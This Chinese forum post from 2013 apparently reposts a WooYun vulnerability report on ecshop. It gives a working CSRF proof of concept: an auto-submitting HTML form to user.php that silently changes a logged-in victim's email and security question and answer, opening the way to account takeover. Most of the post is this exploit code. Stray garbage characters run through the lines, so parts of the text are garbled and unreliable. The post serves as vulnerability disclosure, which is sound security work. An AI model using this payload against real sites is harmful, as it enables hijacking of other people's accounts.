找回密码
 立即注册
查看: 2934|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
2 m. z  w# t) Q. t" E+ N" @ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
# ^0 R" {6 ~' S( X" n, d5 a1 a& f' C" X2 O( Y9 I
Demo For:http://www.wooyun.org/bug.php?action=view&id=395/ }3 Y! n" _6 G1 ]1 @
0 z6 s  g9 j* _$ m# X& L. g
详细说明:
! t4 @( }1 l! |, {6 k. _8 w利用csrf和xss可以突破官方所说的“障碍”
  ^, I) k8 O& \xss版本已经有人说明
  ^9 t1 T9 K0 B3 y这里给出csrf版本
5 S( W. W3 x$ r/ R1 W# L. ~' Y) F7 x% Z- t
漏洞证明:
1 t, w1 Q* K1 S$ ^<html>( j; v2 N! A( s6 z0 p
<body>/ C2 S. p# L7 ^7 `/ n6 y+ |
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">  F9 B* M& t. x8 X4 y0 P, F( `
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
* M7 L6 O1 `& U0 j6 x; N2 Q<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 f2 O: e7 t1 ^' T% E
<INPUT TYPE="text" NAME="sel_question" value="ecshop">* W* E/ t- L4 p8 x7 ~5 W
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">! a  P/ B/ t$ W; y; W
</body>+ m% _# S) t$ M1 M, B# y& v
<script>8 Z5 [8 Q/ }& g/ M! ]
document.forms[0].submit();3 Q& T3 e& J4 F7 m  {, G; V: ^
</script>& |( B: ]0 j" v9 l
</html>
- Z5 A" n7 L! T7 d构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; P  t2 }$ g% p4 s, i' n

( T( M7 }/ t+ H2 R7 E( P' k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表